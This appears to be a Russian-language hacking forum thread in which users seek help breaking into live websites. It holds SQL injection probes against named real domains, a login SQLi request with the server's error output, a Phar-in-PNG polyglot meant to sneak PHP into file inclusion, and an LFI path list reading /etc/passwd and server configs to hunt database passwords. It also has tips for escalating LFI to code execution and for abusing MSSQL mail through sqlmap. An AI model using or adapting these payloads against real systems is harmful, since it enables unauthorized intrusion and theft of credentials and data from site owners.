Был же пример https://forum.antichat.com/threads/337994/ Создаем файл с начинкой /tmp/arc/include/pages.php и готовим архив Code: <?php $p = new Phar('img.phar.png'); $p->setStub('<?php Phar::mapPhar();__HALT_COMPILER(); ?>'); $p->buildFromDirectory('/tmp/arc/','/.*/'); проверяем Code: include("phar://img.phar.png/include/pages.php");
Подскажите, можно ли что нибудь сделать(( а то sqlmap, то выдает: "'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable", потом пишет что пусто(( может дело в 302 редиректе? пробовал и --ignore-redirects и как Y так и N в "got a 302 redirect to 'https://site.com:443/index.php'. Do you want to follow? Spoiler: Запрос-ответ Запрос: Code: POST /login.php HTTP/2 Host: site.com Content-Type: application/x-www-form-urlencoded Content-Length: 30 username=one'two&pswd=password Ответ: Code: HTTP/2 302 Found Server: nginx Date: Sat, 24 Sep 2022 09:27:34 GMT Content-Type: text/html; charset=CP1251 Location: index.php Set-Cookie: PHPSESSID=123abcdefghiklmnopqrstvxyz; path=/ Expires: Sat, 24 Sep 2022 09:27:33 GMT Cache-Control: no-cache Pragma: no-cache Strict-Transport-Security: max-age=31536000; includeSubDomains MSSQL: error, server: site.com, file: /login.php сервер:site.com URL:/login.php IP:xxx.xxx.xxx.xxx В подсети: xxx.xxx.xxx.xxx Файл:login.php Строка:43 Ошибка Incorrect syntax near '\'. Запрос: SELECT id, fio, region, sector, email, user_common_id, fired_date FROM tbl_user WITH(NOLOCK) WHERE login = 'one\'\'two' AND pass = '5f4dcc3b5aa765d61d8327deb882cf998df86ee7b1338fc6b0522860f3f39b9c4e16aab5' AND ISNULL(del, 0) = 0 Уже и тамперы пробовал перебирать((
Как рашифровать тело запроса, где искать ключ и алгоритм? Code: POST /Api/proxy HTTP/1.1 {"request":"F2mN+PF0OAxs0IjJ7n1tkD8ut6/Zev8wu5is27r6qXj3uWtdCGZp2pCPlqUjD/w94+7d633OJNEVdM1eGADuUW5TO8SmDSEIuOM05HHhHnEjEnInECpumx8M8S0Et+x+1Z+eJcEd5is9DBgiZQ3SVXbfS8HICDuKiwgJuDGRRPE="}
Как правильно составить запрос в sqlmap чтобы отправить сообщение через smtp в ms server и можно ли это в других субд? ПРИМЕР: https://habr.com/ru/post/179819/ Пробовал создать профиль --sql-query=EXECUTE msdb.dbo.sysmail_add_account_sp Но получаю 'NULL' Вообщем как составить запросы грамотно
Доброго времени суток! Подскажите, пожалуйста, в какую сторону копать? Не поддается. Думал, что blind, сперва, но по ходу нет Code: https://www.lans.am/am/catalog/3106.htm'+order+by+1--+-
LFI , не могу найти пароли от ДБ. Spoiler /../../../../../../../../../../home/website/website/releases/20221115194516/modules/main/cart.html /../../../../../../../../../../home/website/website/releases/20221115194516/modules/load-module.html /../../../../../../../../../../proc/meminfo /../../../../../../../../../../proc/cpuinfo /../../../../../../../../../../etc/apache2/sites-available/default /../../../../../../../../../../etc/apache2/sites-enabled/000-default /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/mysql/my.cnf /../../../../../../../../../../etc/apache2/apache2.conf /../../../../../../../../../../etc/apache2/envvars /../../../../../../../../../../etc/init.d/apache2 /../../../../../../../../../../etc/default/locale Напишите в личку если кто-то может помочь раскрутить, потому что залиться никак не получается.
есть удаленный доступ к mysql? /proc/self/environ инклуд загруженой картинки, если есть возможность загрузить свой аватар например инклуд позволяет обращаться к враперам? домашняя директория сайта известна? Чем больше инфы тем больше вероятность.
Всем привет Получится воспроизвести RCE в коде Code: $host = $_GET['host']; $text = $_GET['text']; function gif($mes, $vid = true) { $mes = str_ireplace("<br><br>", "<br>", $mes); if($vid){ $mes = preg_replace("':(gif-){1}([0-9]{1,2}):'i", "<img src=\"gif/\\1\\2.gif\">", $mes); } $mes = mb_ereg_replace('\n', '<br />', $mes); $mes = preg_replace('#https?://(www\.)?(?!'.$host.')[^ ]++#iU', '<h2>Ссылка вырезана</h2>', $mes); return $mes; } echo gif($text,false); Как тут https://ik0nw.github.io/2020/09/23/PHP::Preg_replace()-RCE/#CTF-challenge
в CTF примере модификатор "е" Code: '/(' . $regex . ')/ei', исполняет код, у тебя такого нет в твоем коде.
Когда-то нулевым байтом можно было отсечь часть правила и дописать нужные модификаторы, а может это просто байки старых пердунов олдскульщиков Модификатор e с версии PHP7 не используется и выкидывает ошибку. Да и в любом случае, нужно контроллить второй параметр preg_replace, чего не наблюдается в коде выше. XSS это максимум.
Спасибо, только акунетикс экспортирует в формате json,xml,csv, или я не там смотрю ? UPD: Вроде разобрался, скопировал http request с акунетикса в текстовый файл, скульмап вроде скушал
Помогите раскрутить Code: https://www.kfz-bayern.de/presse/mediathek/fotos.html?tx_dscmediacenter_main%5Bcat%5D=2&tx_dscmediacenter_main%5Baction%5D=list&tx_dscmediacenter_main%5Bcontroller%5D=Mediacenter&cHash=81a87cafe17fa24dc1e9c0cb98ad20e0&tx_dscmediacenter_main%5Bamount%5D=5 Проблема в том что ошибка в конце запроса LIMIT 0, 5